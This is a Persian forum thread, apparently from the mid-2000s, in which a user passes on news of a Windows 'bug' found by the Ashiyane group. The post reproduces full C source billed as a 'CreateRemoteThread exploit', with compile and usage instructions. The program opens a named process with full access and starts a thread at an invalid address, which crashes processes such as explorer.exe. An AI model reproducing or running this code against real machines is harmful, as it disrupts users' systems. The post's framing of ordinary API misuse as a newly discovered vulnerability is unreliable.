حالت موضوعی | حالت خطی

a_persian_boy

سلام دوستان
گروه آشيانه توي ويندوز باگ جديد كشف كرده.
خبرشو از اينجا مي تونين بخونين با توضيحات و اكسپلويت
http://www.mosyansar.com
:wink:

a_persian_boy

از بروبچزي كه هم سي كار كردن هم وي بي ميخام بپرسم كه ميشه اينو با وي بي هم نوشت نه ؟
اگر يه تابع اي پي آي استفاده ميكنه ديگه :roll: :roll:

کد: 
#include <windows.h>

#include <tlhelp32.h>

#include <stdio.h>

BOOL exploit(char* chProcessName)

{

        HANDLE hProcessSnap = NULL;

        HANDLE hProcess = NULL;

        BOOL bFound = FALSE;

        BOOL bRet = FALSE;

        PROCESSENTRY32 pe32 = {0};

        UINT uExitCode = 0;

        DWORD dwExitCode = 0;

        LPDWORD lpExitCode = &dwExitCode;

        hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

    if (hProcessSnap == INVALID_HANDLE_VALUE)

    return (FALSE);

   pe32.dwSize = sizeof(PROCESSENTRY32);

    printf("\n[+] Search For Process ... \n");

   while(!bFound && Process32Next(hProcessSnap, &pe32))

   {

       if(lstrcmpi(pe32.szExeFile, chProcessName) == 0)

           bFound = TRUE;

   }

   CloseHandle(hProcessSnap);

   if(!bFound){

                SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),

    FOREGROUND_RED| FOREGROUND_INTENSITY)          ;

           printf("[-] Sorry Process Not Find \n");

           return(FALSE);

  }

   printf("[+] Process Find \n");

   hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID);

   if(hProcess == NULL){

        SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),

    FOREGROUND_RED| FOREGROUND_INTENSITY)          ;

   printf("[-] Sorry Write Access Denied for This Process \n");

   printf("[-] Exploit Failed  :( \n");

   return(FALSE);

   }

   printf("[+] Write Access Is allowed \n");

   printf("[+] Send Exploit To Process ...\n");

   CreateRemoteThread(hProcess,0,0,(DWORD (__stdcall *)(void *))100,0,0,0);

   printf("[+] Successful  :)\n");

   return(pe32.th32ProcessID);

}

int main(int argc,char **argv)

{

char* chProcess = argv[1];

       COORD coordScreen = { 0, 0 };

   DWORD cCharsWritten;

    CONSOLE_SCREEN_BUFFER_INFO csbi;

    DWORD dwConSize;

    HANDLE hConsole = GetStdHandle(STD_OUTPUT_HANDLE);

    GetConsoleScreenBufferInfo(hConsole, &csbi);

    dwConSize = csbi.dwSize.X * csbi.dwSize.Y;

    FillConsoleOutputCharacter(hConsole, TEXT(' '), dwConSize,

        coordScreen, &cCharsWritten);

    GetConsoleScreenBufferInfo(hConsole, &csbi);

    FillConsoleOutputAttribute(hConsole, csbi.wAttributes, dwConSize,

        coordScreen, &cCharsWritten);

    SetConsoleCursorPosition(hConsole, coordScreen);

        SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),

    FOREGROUND_GREEN| FOREGROUND_INTENSITY)        ;

   if(argc < 2) {

        printf("\n");

    printf("

    ==========================================================================   \n");

        printf("  >              Microsoft Windows CreateRemoteThread

        Exploit              <   \n");

    printf("  >            BUG Find By Q7X ( Nima Salehi ) Q7X@Ashiyane.com

    <   \n");

        printf("  >           Exploited By Q7X ( Nima Salehi )

        Q7X@Ashiyane.com            <   \n");

         SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),

    FOREGROUND_RED | FOREGROUND_INTENSITY|FOREGROUND_GREEN|FOREGROUND_BLUE);

    printf("  >  Compile   : cl -o nima.c   ( Win32/VC++ )

    <   \n");

        printf("  >  Usage     : nima.exe  Process

        <   \n");

        printf("  >  Example   : nima.exe  explorer.exe

        <   \n");

        printf("  >  Tested on : Windows XP (SP0 ,SP1 ,SP2) , Windows 2000

        AdvServer (SP4) <   \n");

    printf("  >              Windows 2000 Server (SP4), Windows 2003 (SP0 ,

    SP1)       <   \n");

        SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),

    FOREGROUND_RED| FOREGROUND_INTENSITY)          ;

        printf("  >     Copyright 2002-2005 By Ashiyane Digital Network

        Security Team      <   \n");

    printf("  >     www.Ashiyane.com ( Free )        www.Ashiyane.net ( Not

    Free )     <   \n");

        printf("  >              Special Tanx To My Best Friend Behrooz_Ice

        <   \n");

        printf("

        ==========================================================================  \n");

  }

    else

  exploit(chProcess);

 SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),

    FOREGROUND_RED |FOREGROUND_GREEN|FOREGROUND_BLUE);

}

موضوعات مرتبط با این موضوع...
موضوع		نویسنده	پاسخ	بازدید	آخرین ارسال
	مشكل با UPDATE ويندوز XP	ΛΛ Θ l-l $ Σ Ω	1	2,684	۳۰-دى-۱۳۸۹, ۱۷:۳۱:۰۰ آخرین ارسال: h0x00i
	عدم قبول نكردن پسوورد براي ويندوز (كمك همي الان)	sarv	13	17,533	۱۲-دى-۱۳۸۸, ۱۷:۵۰:۴۷ آخرین ارسال: sarv
	(راهنمايى)آموزش نصب ويندوز se7en	mvig	1	3,254	۲۲-شهریور-۱۳۸۸, ۱۵:۱۲:۵۳ آخرین ارسال: Loyal
	آشنايي با اسرار كرنل ويندوز (آموزشی)	Salivan	0	3,002	۰۷-تير-۱۳۸۸, ۱۰:۴۹:۱۶ آخرین ارسال: Salivan
	پاك كردن ويندوز	sarv	8	21,082	۲۵-خرداد-۱۳۸۸, ۲۳:۵۳:۰۹ آخرین ارسال: sarv
	جدیدترین نسخه ویندوز 7 و اطلاعات دقیق همراه با عکس توسط خودم	Mr.pRoGraMmer	9	10,520	۰۱-اردیبهشت-۱۳۸۸, ۲۳:۱۸:۲۰ آخرین ارسال: Payman62
	ويندوز 7 device stage‌ و بازدهي بيشتر سخت‌افزار	Mr.pRoGraMmer	2	3,938	۲۸-فروردین-۱۳۸۸, ۰۰:۱۶:۴۲ آخرین ارسال: Mr.pRoGraMmer
	ويندوز 7	Mr.pRoGraMmer	0	3,233	۲۸-فروردین-۱۳۸۸, ۰۰:۰۰:۵۲ آخرین ارسال: Mr.pRoGraMmer
	با وجود انتقادهاي بسيار، ويندوز 7 از سوي تحليلگران ستايش شد	Mr.pRoGraMmer	0	2,668	۲۷-فروردین-۱۳۸۸, ۲۳:۵۴:۱۷ آخرین ارسال: Mr.pRoGraMmer
	برداشتن محدودیت ارسال پیغام توسط pm sender	Payman62	29	16,966	۱۶-خرداد-۱۳۸۷, ۰۳:۱۰:۰۳ آخرین ارسال: Payman62

حالت موضوعی \| حالت خطی كشف باگ جديد ويندوز توسط آشيانه
نویسنده	پیام